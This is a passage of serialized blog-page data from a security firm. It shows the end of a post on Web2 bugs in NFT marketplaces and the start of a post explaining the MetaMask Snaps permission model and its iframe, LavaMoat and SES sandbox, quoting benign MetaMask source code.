",{"type":25,"tag":162,"props":39317,"children":39320},{"href":39318,"rel":39319},"https://en.wikipedia.org/wiki/Denial-of-service_attack",[166],[39321],{"type":31,"value":39322},"denial-of-service",{"type":31,"value":39324}," (DoS) attacks.",{"type":25,"tag":38,"props":39326,"children":39327},{},[39328],{"type":31,"value":39329},"Lastly, NFT marketplaces should pay close attention to authentication and authorization controls. Specifically, addressing third-party platform misconfiguration. Applying the least privilege principle is crucial for enhancing security.",{"type":25,"tag":38,"props":39331,"children":39332},{},[39333],{"type":31,"value":39334},"By implementing these security measures, NFT marketplaces can strengthen their security posture, build trust among users, and create a secure environment for the trading and exchange of valuable digital assets.",{"type":25,"tag":453,"props":39336,"children":39337},{"id":32892},[39338],{"type":31,"value":22907},{"type":25,"tag":38,"props":39340,"children":39341},{},[39342],{"type":31,"value":39343},"To recap, the presence of Web 2 bugs in NFT marketplaces emphasizes the need to address the underlying security issues within these platforms. Developers must prioritize not only the integrity of on-chain operations, but also the security of off-chain processes. To ensure an overall robust and trustworthy ecosystem for NFT marketplaces, developers should focus on implementing comprehensive security measures across all the components of the marketplace, engage with third party auditor, and test the entire infrastructure as necessary to identify and address any potential vulnerabilities.",{"type":25,"tag":38,"props":39345,"children":39346},{},[39347],{"type":31,"value":39348},"Most of all, it is especially crucial to educate communities about risks and security best practices. By promoting awareness and providing transparent information, platforms can empower users to make informed decisions and protect themselves against potential scams or fraudulent activities.",{"type":25,"tag":26,"props":39350,"children":39352},{"id":39351},"disclaimer",[39353],{"type":31,"value":39354},"Disclaimer",{"type":25,"tag":38,"props":39356,"children":39357},{},[39358],{"type":31,"value":39359},"Despite our consistent efforts to contact the Rocki Marketplace team regarding our findings, we unfortunately have not received a response. As a result, we decided to disclose this matter to our readers. We will continue to closely monitor the situation and remain open in helping their team resolve this issue.",{"type":25,"tag":9316,"props":39361,"children":39362},{},[39363],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":39365},[39366,39369,39375,39379,39380],{"id":32975,"depth":6769,"text":32978,"children":39367},[39368],{"id":6853,"depth":6778,"text":6856},{"id":35169,"depth":6769,"text":35199,"children":39370},[39371,39372,39373,39374],{"id":35218,"depth":6778,"text":35221},{"id":35283,"depth":6778,"text":35286},{"id":38114,"depth":6778,"text":38117},{"id":38404,"depth":6778,"text":38407},{"id":38749,"depth":6769,"text":38752,"children":39376},[39377,39378],{"id":38771,"depth":6778,"text":38774},{"id":38821,"depth":6778,"text":38824},{"id":38905,"depth":6769,"text":38911},{"id":39351,"depth":6769,"text":39354},"content:blog:2023-08-11-web2-bug-repellant-instructions.md","blog/2023-08-11-web2-bug-repellant-instructions.md","blog/2023-08-11-web2-bug-repellant-instructions",{"_path":39385,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":39386,"description":39387,"author":39388,"image":39389,"date":39391,"isFeatured":16,"onBlogPage":16,"body":39392,"_type":6798,"_id":44408,"_source":6800,"_file":44409,"_stem":44410,"_extension":6803},"/blog/2023-11-01-metamask-snaps","Metamask Snaps: Playing in the Sand","A deep dig into Metamask Snaps. We explore safety considerations, environment design, and break down a property spoofing vulnerability in the Snaps sandboxing layer.",[35163,35162],{"src":39390,"height":17579,"width":17580},"/posts/metamask-snaps/header.png","2023-11-01",{"type":22,"children":39393,"toc":44389},[39394,39398,39403,39408,39413,39419,39424,39430,39443,39448,39453,39460,39492,39498,39503,39521,39528,39534,39548,39554,39574,39838,39866,39872,39891,40277,40296,40309,40627,40648,40919,40924,40930,40935,40948,40953,40966,41225,41269,41282,41288,41302,41308,41314,41327,41364,41370,41390,41501,41528,41534,41552,41565,41571,41576,41594,41705,41710,41731,41744,41761,41861,41887,41904,42026,42052,42064,42069,42075,42081,42086,42109,42114,42119,42125,42131,42158,42561,42588,42615,42621,42652,42961,42980,42985,43010,43023,43029,43056,43351,43387,43405,43410,43445,43450,43454,43459,43466,43471,43498,44275,44295,44301,44322,44371,44375,44380,44385],{"type":25,"tag":26,"props":39395,"children":39396},{"id":22916},[39397],{"type":31,"value":22919},{"type":25,"tag":38,"props":39399,"children":39400},{},[39401],{"type":31,"value":39402},"Metamask snaps are simple modules that extend Metamask's functionality. These modules can be written by anyone, and provide useful features that the vanilla wallet doesn't.",{"type":25,"tag":38,"props":39404,"children":39405},{},[39406],{"type":31,"value":39407},"Metamask provides a sandboxed environment that allows developers to run Snap code safely, without disclosing or tampering with critical information without user permission.",{"type":25,"tag":38,"props":39409,"children":39410},{},[39411],{"type":31,"value":39412},"In this article, we'll explore exactly how the snap execution environment works. We'll then delve into a unique property spoofing vulnerability we reported in the Metamask Snaps sandbox.",{"type":25,"tag":26,"props":39414,"children":39416},{"id":39415},"sandbox-security",[39417],{"type":31,"value":39418},"Sandbox Security",{"type":25,"tag":38,"props":39420,"children":39421},{},[39422],{"type":31,"value":39423},"In the first part of the article, we'll describe how the Metamask sandbox works, and examine what it's doing to protect the security of Snaps.",{"type":25,"tag":606,"props":39425,"children":39427},{"id":39426},"permission-based-security",[39428],{"type":31,"value":39429},"Permission-based security",{"type":25,"tag":38,"props":39431,"children":39432},{},[39433,39435,39441],{"type":31,"value":39434},"Each snap is built to have only the permissions it needs to hold. These permissions are specified in the ",{"type":25,"tag":82,"props":39436,"children":39438},{"className":39437},[],[39439],{"type":31,"value":39440},"snap.manifest.json",{"type":31,"value":39442}," file and can be critical to security.",{"type":25,"tag":38,"props":39444,"children":39445},{},[39446],{"type":31,"value":39447},"Snap security is totally centered around the user, whose decisions can provide dangerous permissions to a malicious snap. Metamask warns about the risk of each permission.",{"type":25,"tag":38,"props":39449,"children":39450},{},[39451],{"type":31,"value":39452},"Here are the critical permissions possible to be given to a snap:",{"type":25,"tag":38,"props":39454,"children":39455},{},[39456],{"type":25,"tag":6467,"props":39457,"children":39459},{"alt":7,"src":39458},"/posts/metamask-snaps/permissions.png",[],{"type":25,"tag":2039,"props":39461,"children":39462},{},[39463,39481],{"type":25,"tag":2043,"props":39464,"children":39465},{},[39466,39472,39473,39479],{"type":25,"tag":82,"props":39467,"children":39469},{"className":39468},[],[39470],{"type":31,"value":39471},"snap_getBip44Entropy",{"type":31,"value":1307},{"type":25,"tag":82,"props":39474,"children":39476},{"className":39475},[],[39477],{"type":31,"value":39478},"snap_getBip32Entropy",{"type":31,"value":39480}," -> a malicious snap retrieving keypair leads to loss of funds",{"type":25,"tag":2043,"props":39482,"children":39483},{},[39484,39490],{"type":25,"tag":82,"props":39485,"children":39487},{"className":39486},[],[39488],{"type":31,"value":39489},"endowment:transaction-insight",{"type":31,"value":39491}," -> a malicious snap getting insights of a transaction before approval can lead to frontrunning attacks",{"type":25,"tag":606,"props":39493,"children":39495},{"id":39494},"snap-execution-environment",[39496],{"type":31,"value":39497},"Snap execution environment",{"type":25,"tag":38,"props":39499,"children":39500},{},[39501],{"type":31,"value":39502},"Snaps are executed in a totally sandboxed environment which provides a safe context for executing untrusted code, and separates it from the normal execution flow. To accomplish this, Metamask uses 3 layers of security to create this safe environment:",{"type":25,"tag":6711,"props":39504,"children":39505},{},[39506,39511,39516],{"type":25,"tag":2043,"props":39507,"children":39508},{},[39509],{"type":31,"value":39510},"An isolated iframe",{"type":25,"tag":2043,"props":39512,"children":39513},{},[39514],{"type":31,"value":39515},"LavaMoat",{"type":25,"tag":2043,"props":39517,"children":39518},{},[39519],{"type":31,"value":39520},"SES (Secure EcmaScript)",{"type":25,"tag":38,"props":39522,"children":39523},{},[39524],{"type":25,"tag":6467,"props":39525,"children":39527},{"alt":7,"src":39526},"/posts/metamask-snaps/environment.png",[],{"type":25,"tag":606,"props":39529,"children":39531},{"id":39530},"isolated-iframe-layer-1",[39532],{"type":31,"value":39533},"Isolated Iframe - Layer 1",{"type":25,"tag":38,"props":39535,"children":39536},{},[39537,39539,39546],{"type":31,"value":39538},"Snaps empower developers to enhance Metamask's functionality while maintaining a strong security posture. These modules execute within an ",{"type":25,"tag":162,"props":39540,"children":39543},{"href":39541,"rel":39542},"https://blog.logrocket.com/the-ultimate-guide-to-iframes/",[166],[39544],{"type":31,"value":39545},"Iframe",{"type":31,"value":39547}," environment, ensuring they are isolated and secure. To facilitate this execution, Metamask takes advantage of an iFrame sandboxing mechanism, allowing snaps to operate in a contained context.",{"type":25,"tag":630,"props":39549,"children":39551},{"id":39550},"the-framework-metamask-extension-repo",[39552],{"type":31,"value":39553},"The Framework: Metamask-Extension Repo",{"type":25,"tag":38,"props":39555,"children":39556},{},[39557,39559,39565,39567,39573],{"type":31,"value":39558},"The process of snap execution kicks off within the metamask-extension repository's ",{"type":25,"tag":82,"props":39560,"children":39562},{"className":39561},[],[39563],{"type":31,"value":39564},"metamask-controller.js",{"type":31,"value":39566}," file. Here's a glimpse of the relevant ",{"type":25,"tag":162,"props":39568,"children":39571},{"href":39569,"rel":39570},"https://github.com/MetaMask/metamask-extension/blob/4b23ea8c95bea9ea12336537bb6bda4568a99098/app/scripts/metamask-controller.js#L978",[166],[39572],{"type":31,"value":82},{"type":31,"value":1472},{"type":25,"tag":206,"props":39575,"children":39579},{"className":39576,"code":39577,"language":39578,"meta":7,"style":7},"language-javascript shiki shiki-themes slack-dark","// Import snaps-controllers\n// ...\nconst snapExecutionServiceArgs = {\n  iframeUrl: new URL(process.env.IFRAME_EXECUTION_ENVIRONMENT_URL),\n  messenger: this.controllerMessenger.getRestricted({\n    name: 'ExecutionService',\n  }),\n  setupSnapProvider: this.setupSnapProvider.bind(this),\n};\n\n// Define IFRAME_EXECUTION_ENVIRONMENT_URL\nprocess.env.IFRAME_EXECUTION_ENVIRONMENT_URL =\n  'https://execution.metamask.io/0.36.1-flask.1/index.html';\n// ...\n","javascript",[39580],{"type":25,"tag":82,"props":39581,"children":39582},{"__ignoreMap":7},[39583,39591,39599,39619,39667,39702,39719,39727,39769,39776,39783,39791,39819,39831],{"type":25,"tag":216,"props":39584,"children":39585},{"class":6922,"line":6923},[39586],{"type":25,"tag":216,"props":39587,"children":39588},{"style":6927},[39589],{"type":31,"value":39590},"// Import snaps-controllers\n",{"type":25,"tag":216,"props":39592,"children":39593},{"class":6922,"line":6769},[39594],{"type":25,"tag":216,"props":39595,"children":39596},{"style":6927},[39597],{"type":31,"value":39598},"// ...\n",{"type":25,"tag":216,"props":39600,"children":39601},{"class":6922,"line":6778},[39602,39606,39611,39615],{"type":25,"tag":216,"props":39603,"children":39604},{"style":6936},[39605],{"type":31,"value":13611},{"type":25,"tag":216,"props":39607,"children":39608},{"style":6947},[39609],{"type":31,"value":39610}," snapExecutionServiceArgs",{"type":25,"tag":216,"props":39612,"children":39613},{"style":6953},[39614],{"type":31,"value":6956},{"type":25,"tag":216,"props":39616,"children":39617},{"style":6964},[39618],{"type":31,"value":7241},{"type":25,"tag":216,"props":39620,"children":39621},{"class":6922,"line":7005},[39622,39627,39631,39636,39640,39645,39649,39654,39658,39663],{"type":25,"tag":216,"props":39623,"children":39624},{"style":6947},[39625],{"type":31,"value":39626},"  iframeUrl:",{"type":25,"tag":216,"props":39628,"children":39629},{"style":6936},[39630],{"type":31,"value":35895},{"type":25,"tag":216,"props":39632,"children":39633},{"style":7047},[39634],{"type":31,"value":39635}," URL",{"type":25,"tag":216,"props":39637,"children":39638},{"style":6964},[39639],{"type":31,"value":1850},{"type":25,"tag":216,"props":39641,"children":39642},{"style":6947},[39643],{"type":31,"value":39644},"process",{"type":25,"tag":216,"props":39646,"children":39647},{"style":6964},[39648],{"type":31,"value":179},{"type":25,"tag":216,"props":39650,"children":39651},{"style":6947},[39652],{"type":31,"value":39653},"env",{"type":25,"tag":216,"props":39655,"children":39656},{"style":6964},[39657],{"type":31,"value":179},{"type":25,"tag":216,"props":39659,"children":39660},{"style":6947},[39661],{"type":31,"value":39662},"IFRAME_EXECUTION_ENVIRONMENT_URL",{"type":25,"tag":216,"props":39664,"children":39665},{"style":6964},[39666],{"type":31,"value":10688},{"type":25,"tag":216,"props":39668,"children":39669},{"class":6922,"line":7110},[39670,39675,39680,39684,39689,39693,39698],{"type":25,"tag":216,"props":39671,"children":39672},{"style":6947},[39673],{"type":31,"value":39674},"  messenger:",{"type":25,"tag":216,"props":39676,"children":39677},{"style":6936},[39678],{"type":31,"value":39679}," this",{"type":25,"tag":216,"props":39681,"children":39682},{"style":6964},[39683],{"type":31,"value":179},{"type":25,"tag":216,"props":39685,"children":39686},{"style":6947},[39687],{"type":31,"value":39688},"controllerMessenger",{"type":25,"tag":216,"props":39690,"children":39691},{"style":6964},[39692],{"type":31,"value":179},{"type":25,"tag":216,"props":39694,"children":39695},{"style":7047},[39696],{"type":31,"value":39697},"getRestricted",{"type":25,"tag":216,"props":39699,"children":39700},{"style":6964},[39701],{"type":31,"value":19098},{"type":25,"tag":216,"props":39703,"children":39704},{"class":6922,"line":7216},[39705,39710,39715],{"type":25,"tag":216,"props":39706,"children":39707},{"style":6947},[39708],{"type":31,"value":39709},"    name:",{"type":25,"tag":216,"props":39711,"children":39712},{"style":8205},[39713],{"type":31,"value":39714}," 'ExecutionService'",{"type":25,"tag":216,"props":39716,"children":39717},{"style":6964},[39718],{"type":31,"value":7465},{"type":25,"tag":216,"props":39720,"children":39721},{"class":6922,"line":7244},[39722],{"type":25,"tag":216,"props":39723,"children":39724},{"style":6964},[39725],{"type":31,"value":39726},"  }),\n",{"type":25,"tag":216,"props":39728,"children":39729},{"class":6922,"line":7257},[39730,39735,39739,39743,39748,39752,39757,39761,39765],{"type":25,"tag":216,"props":39731,"children":39732},{"style":6947},[39733],{"type":31,"value":39734},"  setupSnapProvider:",{"type":25,"tag":216,"props":39736,"children":39737},{"style":6936},[39738],{"type":31,"value":39679},{"type":25,"tag":216,"props":39740,"children":39741},{"style":6964},[39742],{"type":31,"value":179},{"type":25,"tag":216,"props":39744,"children":39745},{"style":6947},[39746],{"type":31,"value":39747},"setupSnapProvider",{"type":25,"tag":216,"props":39749,"children":39750},{"style":6964},[39751],{"type":31,"value":179},{"type":25,"tag":216,"props":39753,"children":39754},{"style":7047},[39755],{"type":31,"value":39756},"bind",{"type":25,"tag":216,"props":39758,"children":39759},{"style":6964},[39760],{"type":31,"value":1850},{"type":25,"tag":216,"props":39762,"children":39763},{"style":6936},[39764],{"type":31,"value":21651},{"type":25,"tag":216,"props":39766,"children":39767},{"style":6964},[39768],{"type":31,"value":10688},{"type":25,"tag":216,"props":39770,"children":39771},{"class":6922,"line":7275},[39772],{"type":25,"tag":216,"props":39773,"children":39774},{"style":6964},[39775],{"type":31,"value":20536},{"type":25,"tag":216,"props":39777,"children":39778},{"class":6922,"line":7296},[39779],{"type":25,"tag":216,"props":39780,"children":39781},{"emptyLinePlaceholder":16},[39782],{"type":31,"value":7642},{"type":25,"tag":216,"props":39784,"children":39785},{"class":6922,"line":7305},[39786],{"type":25,"tag":216,"props":39787,"children":39788},{"style":6927},[39789],{"type":31,"value":39790},"// Define IFRAME_EXECUTION_ENVIRONMENT_URL\n",{"type":25,"tag":216,"props":39792,"children":39793},{"class":6922,"line":7557},[39794,39798,39802,39806,39810,39814],{"type":25,"tag":216,"props":39795,"children":39796},{"style":6947},[39797],{"type":31,"value":39644},{"type":25,"tag":216,"props":39799,"children":39800},{"style":6964},[39801],{"type":31,"value":179},{"type":25,"tag":216,"props":39803,"children":39804},{"style":6947},[39805],{"type":31,"value":39653},{"type":25,"tag":216,"props":39807,"children":39808},{"style":6964},[39809],{"type":31,"value":179},{"type":25,"tag":216,"props":39811,"children":39812},{"style":6947},[39813],{"type":31,"value":39662},{"type":25,"tag":216,"props":39815,"children":39816},{"style":6953},[39817],{"type":31,"value":39818}," =\n",{"type":25,"tag":216,"props":39820,"children":39821},{"class":6922,"line":7574},[39822,39827],{"type":25,"tag":216,"props":39823,"children":39824},{"style":8205},[39825],{"type":31,"value":39826},"  'https://execution.metamask.io/0.36.1-flask.1/index.html'",{"type":25,"tag":216,"props":39828,"children":39829},{"style":6964},[39830],{"type":31,"value":6967},{"type":25,"tag":216,"props":39832,"children":39833},{"class":6922,"line":7591},[39834],{"type":25,"tag":216,"props":39835,"children":39836},{"style":6927},[39837],{"type":31,"value":39598},{"type":25,"tag":38,"props":39839,"children":39840},{},[39841,39843,39849,39851,39857,39859,39864],{"type":31,"value":39842},"This code is defining the ",{"type":25,"tag":82,"props":39844,"children":39846},{"className":39845},[],[39847],{"type":31,"value":39848},"snapExecutionServiceArgs",{"type":31,"value":39850}," object, which contains information required for the ",{"type":25,"tag":82,"props":39852,"children":39854},{"className":39853},[],[39855],{"type":31,"value":39856},"IframeExecutionService",{"type":31,"value":39858}," to execute snaps. The ",{"type":25,"tag":82,"props":39860,"children":39862},{"className":39861},[],[39863],{"type":31,"value":39662},{"type":31,"value":39865}," points to the location where the execution environment resides.",{"type":25,"tag":630,"props":39867,"children":39869},{"id":39868},"executing-snaps-iframeexecutionservice-in-action",[39870],{"type":31,"value":39871},"Executing Snaps: IframeExecutionService in Action",{"type":25,"tag":38,"props":39873,"children":39874},{},[39875,39877,39882,39884,39890],{"type":31,"value":39876},"Inside the snaps-controller package's IframeExecutionService.ts file, the ",{"type":25,"tag":82,"props":39878,"children":39880},{"className":39879},[],[39881],{"type":31,"value":39856},{"type":31,"value":39883}," orchestrates snap execution. Again, here's a snippet of the relevant ",{"type":25,"tag":162,"props":39885,"children":39888},{"href":39886,"rel":39887},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-controllers/src/services/AbstractExecutionService.ts#L89",[166],[39889],{"type":31,"value":82},{"type":31,"value":1472},{"type":25,"tag":206,"props":39892,"children":39896},{"className":39893,"code":39894,"language":39895,"meta":7,"style":7},"language-typescript shiki shiki-themes slack-dark","// Register message handlers for snap interactions\nthis.#messenger.registerActionHandler(\n  `${controllerName}:handleRpcRequest`,\n  async (snapId: string, options: SnapRpcHookArgs) =>\n    this.handleRpcRequest(snapId, options),\n);\n\n// More handlers for executeSnap, terminateSnap, etc.\n// ...\n\n// Execute a snap\nasync executeSnap(snapData: SnapExecutionData) {\n  // Initialize job, streams, and environment\n  const { jobId } = await this.initJob(snapData);\n  const { worker, stream } = await this.initEnvStream(jobId);\n  // ...\n}\n","typescript",[39897],{"type":25,"tag":82,"props":39898,"children":39899},{"__ignoreMap":7},[39900,39908,39937,39967,40020,40057,40064,40071,40079,40086,40093,40101,40136,40144,40200,40262,40270],{"type":25,"tag":216,"props":39901,"children":39902},{"class":6922,"line":6923},[39903],{"type":25,"tag":216,"props":39904,"children":39905},{"style":6927},[39906],{"type":31,"value":39907},"// Register message handlers for snap interactions\n",{"type":25,"tag":216,"props":39909,"children":39910},{"class":6922,"line":6769},[39911,39915,39919,39924,39928,39933],{"type":25,"tag":216,"props":39912,"children":39913},{"style":6936},[39914],{"type":31,"value":21651},{"type":25,"tag":216,"props":39916,"children":39917},{"style":6964},[39918],{"type":31,"value":179},{"type":25,"tag":216,"props":39920,"children":39921},{"style":6947},[39922],{"type":31,"value":39923},"#messenger",{"type":25,"tag":216,"props":39925,"children":39926},{"style":6964},[39927],{"type":31,"value":179},{"type":25,"tag":216,"props":39929,"children":39930},{"style":7047},[39931],{"type":31,"value":39932},"registerActionHandler",{"type":25,"tag":216,"props":39934,"children":39935},{"style":6964},[39936],{"type":31,"value":7420},{"type":25,"tag":216,"props":39938,"children":39939},{"class":6922,"line":6778},[39940,39945,39949,39954,39958,39963],{"type":25,"tag":216,"props":39941,"children":39942},{"style":8205},[39943],{"type":31,"value":39944},"  `",{"type":25,"tag":216,"props":39946,"children":39947},{"style":6936},[39948],{"type":31,"value":38071},{"type":25,"tag":216,"props":39950,"children":39951},{"style":6947},[39952],{"type":31,"value":39953},"controllerName",{"type":25,"tag":216,"props":39955,"children":39956},{"style":6936},[39957],{"type":31,"value":38103},{"type":25,"tag":216,"props":39959,"children":39960},{"style":8205},[39961],{"type":31,"value":39962},":handleRpcRequest`",{"type":25,"tag":216,"props":39964,"children":39965},{"style":6964},[39966],{"type":31,"value":7465},{"type":25,"tag":216,"props":39968,"children":39969},{"class":6922,"line":7005},[39970,39975,39979,39984,39988,39993,39997,40002,40006,40011,40015],{"type":25,"tag":216,"props":39971,"children":39972},{"style":6936},[39973],{"type":31,"value":39974},"  async",{"type":25,"tag":216,"props":39976,"children":39977},{"style":6964},[39978],{"type":31,"value":7016},{"type":25,"tag":216,"props":39980,"children":39981},{"style":6947},[39982],{"type":31,"value":39983},"snapId",{"type":25,"tag":216,"props":39985,"children":39986},{"style":6953},[39987],{"type":31,"value":1472},{"type":25,"tag":216,"props":39989,"children":39990},{"style":7375},[39991],{"type":31,"value":39992}," string",{"type":25,"tag":216,"props":39994,"children":39995},{"style":6964},[39996],{"type":31,"value":7026},{"type":25,"tag":216,"props":39998,"children":39999},{"style":6947},[40000],{"type":31,"value":40001},"options",{"type":25,"tag":216,"props":40003,"children":40004},{"style":6953},[40005],{"type":31,"value":1472},{"type":25,"tag":216,"props":40007,"children":40008},{"style":7375},[40009],{"type":31,"value":40010}," SnapRpcHookArgs",{"type":25,"tag":216,"props":40012,"children":40013},{"style":6964},[40014],{"type":31,"value":7036},{"type":25,"tag":216,"props":40016,"children":40017},{"style":6936},[40018],{"type":31,"value":40019},"=>\n",{"type":25,"tag":216,"props":40021,"children":40022},{"class":6922,"line":7110},[40023,40028,40032,40037,40041,40045,40049,40053],{"type":25,"tag":216,"props":40024,"children":40025},{"style":6936},[40026],{"type":31,"value":40027},"    this",{"type":25,"tag":216,"props":40029,"children":40030},{"style":6964},[40031],{"type":31,"value":179},{"type":25,"tag":216,"props":40033,"children":40034},{"style":7047},[40035],{"type":31,"value":40036},"handleRpcRequest",{"type":25,"tag":216,"props":40038,"children":40039},{"style":6964},[40040],{"type":31,"value":1850},{"type":25,"tag":216,"props":40042,"children":40043},{"style":6947},[40044],{"type":31,"value":39983},{"type":25,"tag":216,"props":40046,"children":40047},{"style":6964},[40048],{"type":31,"value":7026},{"type":25,"tag":216,"props":40050,"children":40051},{"style":6947},[40052],{"type":31,"value":40001},{"type":25,"tag":216,"props":40054,"children":40055},{"style":6964},[40056],{"type":31,"value":10688},{"type":25,"tag":216,"props":40058,"children":40059},{"class":6922,"line":7216},[40060],{"type":25,"tag":216,"props":40061,"children":40062},{"style":6964},[40063],{"type":31,"value":7797},{"type":25,"tag":216,"props":40065,"children":40066},{"class":6922,"line":7244},[40067],{"type":25,"tag":216,"props":40068,"children":40069},{"emptyLinePlaceholder":16},[40070],{"type":31,"value":7642},{"type":25,"tag":216,"props":40072,"children":40073},{"class":6922,"line":7257},[40074],{"type":25,"tag":216,"props":40075,"children":40076},{"style":6927},[40077],{"type":31,"value":40078},"// More handlers for executeSnap, terminateSnap, etc.\n",{"type":25,"tag":216,"props":40080,"children":40081},{"class":6922,"line":7275},[40082],{"type":25,"tag":216,"props":40083,"children":40084},{"style":6927},[40085],{"type":31,"value":39598},{"type":25,"tag":216,"props":40087,"children":40088},{"class":6922,"line":7296},[40089],{"type":25,"tag":216,"props":40090,"children":40091},{"emptyLinePlaceholder":16},[40092],{"type":31,"value":7642},{"type":25,"tag":216,"props":40094,"children":40095},{"class":6922,"line":7305},[40096],{"type":25,"tag":216,"props":40097,"children":40098},{"style":6927},[40099],{"type":31,"value":40100},"// Execute a snap\n",{"type":25,"tag":216,"props":40102,"children":40103},{"class":6922,"line":7557},[40104,40109,40114,40118,40123,40127,40132],{"type":25,"tag":216,"props":40105,"children":40106},{"style":6947},[40107],{"type":31,"value":40108},"async",{"type":25,"tag":216,"props":40110,"children":40111},{"style":7047},[40112],{"type":31,"value":40113}," executeSnap",{"type":25,"tag":216,"props":40115,"children":40116},{"style":6964},[40117],{"type":31,"value":1850},{"type":25,"tag":216,"props":40119,"children":40120},{"style":6947},[40121],{"type":31,"value":40122},"snapData",{"type":25,"tag":216,"props":40124,"children":40125},{"style":6964},[40126],{"type":31,"value":19288},{"type":25,"tag":216,"props":40128,"children":40129},{"style":6947},[40130],{"type":31,"value":40131},"SnapExecutionData",{"type":25,"tag":216,"props":40133,"children":40134},{"style":6964},[40135],{"type":31,"value":18761},{"type":25,"tag":216,"props":40137,"children":40138},{"class":6922,"line":7574},[40139],{"type":25,"tag":216,"props":40140,"children":40141},{"style":6927},[40142],{"type":31,"value":40143},"  // Initialize job, streams, and environment\n",{"type":25,"tag":216,"props":40145,"children":40146},{"class":6922,"line":7591},[40147,40152,40156,40161,40166,40170,40175,40179,40183,40188,40192,40196],{"type":25,"tag":216,"props":40148,"children":40149},{"style":6936},[40150],{"type":31,"value":40151},"  const",{"type":25,"tag":216,"props":40153,"children":40154},{"style":6964},[40155],{"type":31,"value":13542},{"type":25,"tag":216,"props":40157,"children":40158},{"style":6947},[40159],{"type":31,"value":40160},"jobId",{"type":25,"tag":216,"props":40162,"children":40163},{"style":6964},[40164],{"type":31,"value":40165}," } ",{"type":25,"tag":216,"props":40167,"children":40168},{"style":6953},[40169],{"type":31,"value":266},{"type":25,"tag":216,"props":40171,"children":40172},{"style":6973},[40173],{"type":31,"value":40174}," await",{"type":25,"tag":216,"props":40176,"children":40177},{"style":6936},[40178],{"type":31,"value":39679},{"type":25,"tag":216,"props":40180,"children":40181},{"style":6964},[40182],{"type":31,"value":179},{"type":25,"tag":216,"props":40184,"children":40185},{"style":7047},[40186],{"type":31,"value":40187},"initJob",{"type":25,"tag":216,"props":40189,"children":40190},{"style":6964},[40191],{"type":31,"value":1850},{"type":25,"tag":216,"props":40193,"children":40194},{"style":6947},[40195],{"type":31,"value":40122},{"type":25,"tag":216,"props":40197,"children":40198},{"style":6964},[40199],{"type":31,"value":7797},{"type":25,"tag":216,"props":40201,"children":40202},{"class":6922,"line":7604},[40203,40207,40211,40216,40220,40225,40229,40233,40237,40241,40245,40250,40254,40258],{"type":25,"tag":216,"props":40204,"children":40205},{"style":6936},[40206],{"type":31,"value":40151},{"type":25,"tag":216,"props":40208,"children":40209},{"style":6964},[40210],{"type":31,"value":13542},{"type":25,"tag":216,"props":40212,"children":40213},{"style":6947},[40214],{"type":31,"value":40215},"worker",{"type":25,"tag":216,"props":40217,"children":40218},{"style":6964},[40219],{"type":31,"value":7026},{"type":25,"tag":216,"props":40221,"children":40222},{"style":6947},[40223],{"type":31,"value":40224},"stream",{"type":25,"tag":216,"props":40226,"children":40227},{"style":6964},[40228],{"type":31,"value":40165},{"type":25,"tag":216,"props":40230,"children":40231},{"style":6953},[40232],{"type":31,"value":266},{"type":25,"tag":216,"props":40234,"children":40235},{"style":6973},[40236],{"type":31,"value":40174},{"type":25,"tag":216,"props":40238,"children":40239},{"style":6936},[40240],{"type":31,"value":39679},{"type":25,"tag":216,"props":40242,"children":40243},{"style":6964},[40244],{"type":31,"value":179},{"type":25,"tag":216,"props":40246,"children":40247},{"style":7047},[40248],{"type":31,"value":40249},"initEnvStream",{"type":25,"tag":216,"props":40251,"children":40252},{"style":6964},[40253],{"type":31,"value":1850},{"type":25,"tag":216,"props":40255,"children":40256},{"style":6947},[40257],{"type":31,"value":40160},{"type":25,"tag":216,"props":40259,"children":40260},{"style":6964},[40261],{"type":31,"value":7797},{"type":25,"tag":216,"props":40263,"children":40264},{"class":6922,"line":7613},[40265],{"type":25,"tag":216,"props":40266,"children":40267},{"style":6927},[40268],{"type":31,"value":40269},"  // ...\n",{"type":25,"tag":216,"props":40271,"children":40272},{"class":6922,"line":7636},[40273],{"type":25,"tag":216,"props":40274,"children":40275},{"style":6964},[40276],{"type":31,"value":7874},{"type":25,"tag":38,"props":40278,"children":40279},{},[40280,40281,40286,40288,40294],{"type":31,"value":474},{"type":25,"tag":82,"props":40282,"children":40284},{"className":40283},[],[40285],{"type":31,"value":39856},{"type":31,"value":40287}," registers message handlers that facilitate communication between Metamask and snaps within the iFrame. The ",{"type":25,"tag":82,"props":40289,"children":40291},{"className":40290},[],[40292],{"type":31,"value":40293},"${controllerName}:executeSnap",{"type":31,"value":40295}," handler triggers the snap execution process.",{"type":25,"tag":630,"props":40297,"children":40299},{"id":40298},"step-by-step-execution-from-initialization-to-iframe-creation",[40300,40302],{"type":31,"value":40301},"Step-by-Step Execution: From Initialization to iFrame ",{"type":25,"tag":162,"props":40303,"children":40306},{"href":40304,"rel":40305},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-controllers/src/services/iframe/IframeExecutionService.ts#L31",[166],[40307],{"type":31,"value":40308},"creation",{"type":25,"tag":206,"props":40310,"children":40312},{"className":39893,"code":40311,"language":39895,"meta":7,"style":7},"protected async initEnvStream(jobId: string): Promise\u003C{\n    worker: Window;\n    stream: BasePostMessageStream;\n  }> {\n    const iframeWindow = await createWindow(this.iframeUrl.toString(), jobId);\n\n    const stream = new WindowPostMessageStream({\n      name: 'parent',\n      target: 'child',\n      targetWindow: iframeWindow,\n      targetOrigin: '*',\n    });\n\n    return { worker: iframeWindow, stream };\n  }\n",[40313],{"type":25,"tag":82,"props":40314,"children":40315},{"__ignoreMap":7},[40316,40365,40386,40407,40415,40479,40486,40514,40531,40548,40565,40582,40589,40596,40620],{"type":25,"tag":216,"props":40317,"children":40318},{"class":6922,"line":6923},[40319,40324,40329,40334,40338,40342,40346,40350,40355,40360],{"type":25,"tag":216,"props":40320,"children":40321},{"style":6947},[40322],{"type":31,"value":40323},"protected",{"type":25,"tag":216,"props":40325,"children":40326},{"style":6947},[40327],{"type":31,"value":40328}," async",{"type":25,"tag":216,"props":40330,"children":40331},{"style":7047},[40332],{"type":31,"value":40333}," 